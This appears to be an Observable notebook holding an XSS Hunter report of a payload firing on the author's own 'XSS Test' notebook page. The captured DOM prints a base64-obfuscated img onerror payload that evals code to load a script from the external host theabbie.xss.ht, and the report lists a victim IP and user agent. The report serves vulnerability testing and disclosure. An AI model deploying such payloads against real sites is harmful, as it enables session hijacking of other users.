a pseudo-introvert, a web developer, and a maker
Published
Edited
Aug 11, 2020
md`# XSS Hunter Report
The page located at \`https://theabbie.static.observableusercontent.com/worker/worker.2e73608f8145b91e73428b4c507ff71657bde06e5c8a1470dff7af4714c84ae0.html\` suffers from a Cross-site Scripting (XSS) vulnerability. XSS is a vulnerability which occurs when user input is unsafely encorporated into the HTML markup inside of a webpage. When not properly escaped an attacker can inject malicious JavaScript that, once evaluated, can be used to hijack authenticated sessions and rewrite the vulnerable page's layout and functionality. The following report contains information on an XSS payload that has fired on \`https://theabbie.static.observableusercontent.com\`, it can be used to reproduce and remediate the vulnerability.
### XSS Payload Fire Details
##### Vulnerable Page
\`https://theabbie.static.observableusercontent.com/worker/worker.2e73608f8145b91e73428b4c507ff71657bde06e5c8a1470dff7af4714c84ae0.html\`
##### Victim IP Address
\`49.32.50.36\`
##### Referer
\`https://observablehq.com/new\`
##### User Agent
\`Mozilla/5.0 (Linux; Android 10; Redmi Note 7 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36\`
##### Cookies (Non-HTTPOnly)
##### Document Object Model (DOM)
\`\`\`html
<html><head><meta charset="utf-8">
<base target="_top" href="https://observablehq.com/d/22a28a6d91cd6133">
<style>/*Copyright 2020 Observable, Inc.*/@import url("https://fonts.googleapis.com/css2?family=Source+Serif+Pro:ital,wght@0,400;0,600;0,700;1,400;1,600;1,700&display=swap");:root{--syntax_normal:#1b1e23;--syntax_comment:#828282;--syntax_diff:#24292e;--syntax_diff_bg:#fff;--syntax_number:#20a5ba;--syntax_keyword:#c30771;--syntax_atom:#10a778;--syntax_string:#008ec4;--syntax_error:#ffbedc;--syntax_unknown_variable:#838383;--syntax_known_variable:#005f87;--syntax_matchbracket:#20bbfc;--syntax_key:#6636b4;--selection:#d7d4f0;--hr:rgba(0,0,0,0.05);--mono_fonts:14px/1.5 Menlo,Consolas,monospace;--sans-serif:-apple-system,BlinkMacSystemFont,"avenir next",avenir,helvetica,"helvetica neue",ubuntu,roboto,noto,"segoe ui",arial,sans-serif}body{margin:0 14px;font-family:"Source Serif Pro",Iowan Old Style,Apple Garamond,Palatino Linotype,Times New Roman,"Droid Serif",Times,serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol;font-size:17px;line-height:1.5;-webkit-text-size-adjust:100%;-webkit-font-smoothing:antialiased;color:#1b1e23}body.fullscreen{margin:0}h1,h2,h3,h4,h5,h6{color:#333;font-weight:700;line-height:1.15;margin-top:0;margin-bottom:.25em}h2~p,h3~p,h4~p{margin-top:0}a[href]{text-decoration:none}a[href]:hover{text-decoration:underline}h1 code,h2 code,h3 code,h4 code,h5 code,h6 code{font-size:90%}code,pre,tt{font:var(--mono_fonts)}img{max-width:calc(100vw - 28px)}.katex-display,figure,h1,h2,h3,h4,h5,h6,p,table{max-width:640px}blockquote,ol,ul{max-width:600px}blockquote{margin:1em 1.5em}ol,ul{padding-left:28px}hr{height:1px;margin:1em 0;padding:1em 0;border:none;background:no-repeat 50%/100% 1px linear-gradient(90deg,var(--hr),var(--hr))}pre{padding:2px 0}.observablehq--md-pre{overflow-x:auto}.observablehq>link:only-child,.observablehq>style:only-child{display:block;visibility:hidden;padding:6px 0;white-space:nowrap;font:var(--mono_fonts);color:var(--syntax_keyword)}.observablehq>link:only-child:before{content:"<link>";visibility:visible;text-decoration:none;pointer-events:none}.observablehq>style:only-child:before{content:"<style>";visibility:visible}input:not([type]),input[type=email],input[type=number],input[type=password],input[type=range],input[type=search],input[type=tel],input[type=text],input[type=url]{width:240px}canvas,input{vertical-align:middle}table{width:100%;border-collapse:collapse;font-family:var(--sans-serif);font-size:14px}th{text-align:left}tr:not(:last-child){border-bottom:1px solid #eee}thead tr{border-bottom:1px solid #ccc}figure{margin:1em 0}figure img{max-width:100%}figcaption{font:small var(--sans-serif);color:var(--syntax_unknown_variable)}.observablehq--collapsed,.observablehq--expanded,.observablehq--function,.observablehq--gray,.observablehq--import,.observablehq--string:after,.observablehq--string:before{color:var(--syntax_normal)}.observablehq--collapsed,.observablehq--expanded.observablehq--inspect a{cursor:pointer}.observablehq--caret{margin-right:4px;vertical-align:baseline}.observablehq--field{text-indent:-1em;margin-left:1em}.hljs-comment,.observablehq--empty,.observablehq--prototype-key{color:var(--syntax_comment)}.hljs-built_in{color:var(--syntax_known_variable)}.observablehq--unknown{color:var(--syntax_unknown_variable)}.hljs-doctag,.hljs-keyword,.hljs-name,.hljs-section,.hljs-selector-class,.hljs-selector-id,.hljs-selector-tag,.hljs-strong,.hljs-tag,.hljs-type{color:var(--syntax_keyword)}.observablehq--blue,.observablehq--keyword,a[href]{color:#3182bd}.hljs-deletion,.hljs-variable,.observablehq--forbidden,.observablehq--pink{color:#e377c2}.observablehq--orange{color:#e6550d}.hljs-literal,.observablehq--boolean,.observablehq--null,.observablehq--undefined{color:var(--syntax_atom)}.hljs-bullet,.hljs-link,.hljs-number,.hljs-regexp,.observablehq--bigint,.observablehq--date,.observablehq--green,.observablehq--number,.observablehq--regexp,.observablehq--symbol{color:var(--syntax_number)}.observablehq--index,.observablehq--key{color:var(--syntax_key)}.observablehq--empty{font-style:oblique}.hljs-addition,.hljs-meta,.hljs-string,.hljs-symbol,.hljs-template-tag,.hljs-template-variable,.observablehq--purple,.observablehq--string{color:var(--syntax_string)}.observablehq--error,.observablehq--red{color:#e7040f}.observablehq{position:relative;margin:17px 0;min-height:33px}.observablehq:before{content:"";position:absolute;left:-14px;height:100%;width:4px;transition:background-color .25s linear}.observablehq--changed:before,.observablehq--running:before{background-color:#a9b0bc;transition:none}.observablehq--error:before{background-color:#e7040f}.observablehq--inspect{font:var(--mono_fonts);overflow-x:auto;display:block;padding:6px 0;white-space:pre}.observablehq--inspect.observablehq--import{white-space:normal}.observablehq--inspect::-webkit-scrollbar{display:none}.observablehq--error .observablehq--inspect{word-break:break-all;white-space:pre-wrap}.observablehq--string-expand{margin-left:6px;padding:2px 6px;border-radius:2px;font-size:80%;background:#eee;color:var(--syntax_normal);cursor:pointer;vertical-align:middle;position:sticky;right:0}.observablehq--string-expand:active,.observablehq--string-expand:hover{background:#ddd}</style>
</head><body>
<script src="https://static.observableusercontent.com/worker/worker.905879b7a55ddbd0d3d15eab1e6a03c933bd3f9101324668f56e939031ebc03c.js"></script><div><div class="observablehq" dir="auto" style="margin-bottom: 174px;"><span><h1>XSS Test</h1>
<img src="x" id="dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdGhlYWJiaWUueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw==" onerror="eval(atob(this.id))"></span></div></div><script src="https://theabbie.xss.ht"></script></body></html>
\`\`\`
##### Injection Point (Raw HTTP Request)
\`\`\`http
Could not correlate XSS payload fire with request!
\`\`\`
##### Origin
\`https://theabbie.static.observableusercontent.com\`
##### HTML5 Canvas-Rendered Screenshot
https://api.xsshunter.com/uploads/xsshunter_screenshot_920c4fce8011cf88461b1af2bbae5c61b494f51d6211cb13172f58691bf2289a04615b514f4962c09d5b71e7177b72b48e1553c32d5dfe72cf1f67bfb07a80b4c3b4b963a96bdc50ab340c33edd2eaace29f2e740e596b491c04beb4e99e8628dff8de9b.png
##### Injection Timestamp
\`1597127790\`
## Remediation
For more information about Cross-site Scripting and remediation of the issue, see the following resources:
* [Cross-site Scripting (XSS) - OWASP](https://www.owasp.org/index.php/Cross-site_Scripting_(XSS))
* [XSS (Cross Site Scripting) Prevention Cheat Sheet - OWASP](https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet)
* [What is Cross-site Scripting and How Can You Fix it?](https://www.acunetix.com/websitesecurity/cross-site-scripting/)
* [An Introduction to Content Security Policy - HTML5 Rocks](http://www.html5rocks.com/en/tutorials/security/content-security-policy/)
* [Why is the same origin policy so important? - Information Security Stack Exchange](https://security.stackexchange.com/questions/8264/why-is-the-same-origin-policy-so-important)
*This report was generated by the service hosted at [XSSHunter.com](https://xsshunter.com/).*`
Purpose-built for displays of data
Observable is your go-to platform for exploring data and creating expressive data visualizations. Use reactive JavaScript notebooks for prototyping and a collaborative canvas for visual data exploration and dashboard creation.
